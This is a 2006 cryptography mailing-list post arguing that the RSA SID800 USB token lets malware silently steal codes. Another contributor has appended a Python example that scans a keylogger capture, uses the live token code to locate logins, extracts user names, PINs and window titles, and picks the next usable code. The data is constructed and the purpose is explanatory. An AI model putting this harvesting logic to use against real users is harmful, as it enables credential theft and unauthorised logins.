RSA SecurID SID800 Token vulnerable by design

Hadmut Danisch hadmut at danisch.de
Fri Sep 8 14:22:55 EDT 2006


Hi Lance,

On Fri, Sep 08, 2006 at 10:26:45AM -0700, Lance James wrote:
> 
> Another problem from what I see with Malware that steals data is the
> formgrabbing and "on event" logging of data. Malware can detect if
> SecurID is being used based on targeted events, example: Say HSBC
> (Hypothetical example, not targeting HSBC) has two-factor logins in
> place, the problem with this is that it is vulnerable to session riding
> and trojan-in-the-middle attacks anyway, because the minute the user
> logs in, the malware could launder money out (unless transaction auth is
> in place, which in most cases it's not), or they could pharm the user
> with a fake website that resolves as HSBC but they go in within the time
> frame of that token being valid and have access. Either way, however you
> cut it, SecurID/Two-Factor User auth is not protected against malware,
> period.


Partly agreed. These are the kinds of attacks I usually teach in my
workshops.

However, in all of these cases the attacker has to be online at the
moment you are logging in, and you experience some failure, e.g. you
can't log in or something like that.

But with the SID800, malware could silently sit in the background and
pass token codes to the attacker even if you are not logging in at that
moment. E.g. it could wait until you have logged in (or out) and grab
the next token code.

Furthermore, the attack you described presumes that the attacker knows
where you want to log in. But if you can use the current token code
as an indicator when searching for login data in the input stream, then
you can find new places to log in, e.g. your company VPN access point.

While the attack you describe is more important for banking, the USB
attack is aimed more at company logins.

regards
Hadmut
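Added example (mine, not part of Hadmut's mail or any RSA code): the two points above, used the current token code as a search anchor in captured keyboard input to find the login it belongs to, and the next code after an observed login being the one an attacker can use before the user does. It assumes malware can already read the codes from the token over USB (the premise of this thread), that codes are 6-digit and stay valid for 60 seconds, that a passcode is typed as PIN followed by code, and that logins are typed as Tab-separated fields ending in Enter. The capture, the window titles and the host names are constructed for illustration.

```python
"""Using a token code as a search anchor in a keystroke capture.

Added example, not from the original mail. All data is constructed; the
60-second validity, 6-digit codes, Tab/Enter field layout and window titles
are assumptions made for illustration.
"""
from dataclasses import dataclass

TOKEN_VALIDITY = 60  # seconds a code is assumed to stay valid (assumption)


@dataclass
class Event:
    ts: int      # seconds since capture start (constructed)
    kind: str    # "title" = foreground window title, "kbd" = typed text
    text: str


@dataclass
class Login:
    code: str    # token code found in the typed text
    ts: int      # when the field containing it was completed
    window: str  # window title at the time (tells the attacker *where*)
    fields: list # fields typed before the passcode, e.g. the user name
    pin: str     # whatever preceded the code in the same field (PIN, assumed)


# Codes as the malware would read them from the USB token, as
# (first_valid_ts, code). Constructed values.
TOKEN_CODES = [(990, "123456"), (1050, "654321"), (1110, "111222")]

# Constructed capture: a VPN login, a webmail login without a token, a stale
# code typed into a spreadsheet, and an intranet login with PIN+code in one field.
CAPTURE = [
    Event(1000, "title", "VPN Gateway - vpn.example.test"),
    Event(1005, "kbd", "hdanisch\t"),
    Event(1010, "kbd", "pin1234"),
    Event(1020, "kbd", "123456\n"),
    Event(1100, "title", "Webmail - mail.example.test"),
    Event(1105, "kbd", "hdanisch\tS3cret!\n"),
    Event(1120, "title", "Spreadsheet"),
    Event(1125, "kbd", "654321\n"),
    Event(1130, "title", "Intranet - admin.example.test"),
    Event(1135, "kbd", "admin\tpin1234111222\n"),
]


def split_typed(capture):
    """Yield (window, fields) per Enter; each field is (ts_of_last_key, text)."""
    window, fields, buf, buf_ts = "", [], [], None
    for ev in capture:
        if ev.kind == "title":
            window = ev.text
            continue
        for ch in ev.text:
            if ch in "\t\n":
                fields.append((buf_ts if buf_ts is not None else ev.ts, "".join(buf)))
                buf, buf_ts = [], None
                if ch == "\n":
                    yield window, fields
                    fields = []
            else:
                buf.append(ch)
                buf_ts = ev.ts


def code_valid_at(code_entry, ts, validity=TOKEN_VALIDITY):
    """True if the code was the live one when the field was typed."""
    start, _ = code_entry
    return start <= ts < start + validity


def find_logins(capture, token_codes, validity=TOKEN_VALIDITY):
    """Locate every line of input that ends a field with a code that was
    valid at that moment; the fields before it and the window title are the
    login data the attacker was looking for. Stale codes are ignored, which
    keeps a random 6-digit number typed elsewhere from matching."""
    logins = []
    for window, fields in split_typed(capture):
        for i, (ts, text) in enumerate(fields):
            for entry in token_codes:
                start, code = entry
                if text.endswith(code) and code_valid_at(entry, ts, validity):
                    logins.append(Login(code=code, ts=ts, window=window,
                                        fields=[t for _, t in fields[:i]],
                                        pin=text[:-len(code)]))
                    break
    return logins


def next_code_after(ts, token_codes):
    """The first code that becomes valid after an observed login: the user
    has just spent the previous one, so this one is free for the attacker."""
    for start, code in sorted(token_codes):
        if start > ts:
            return code
    return None


if __name__ == "__main__":
    for login in find_logins(CAPTURE, TOKEN_CODES):
        print(login, "next usable code:", next_code_after(login.ts, TOKEN_CODES))
```

The validity check is what makes the code a usable anchor: without it, any six digits in the input stream would match, with it only the passcode actually typed while that code was live does, and the window title captured alongside names the service the attacker can now log in to.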




---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo at metzdowd.com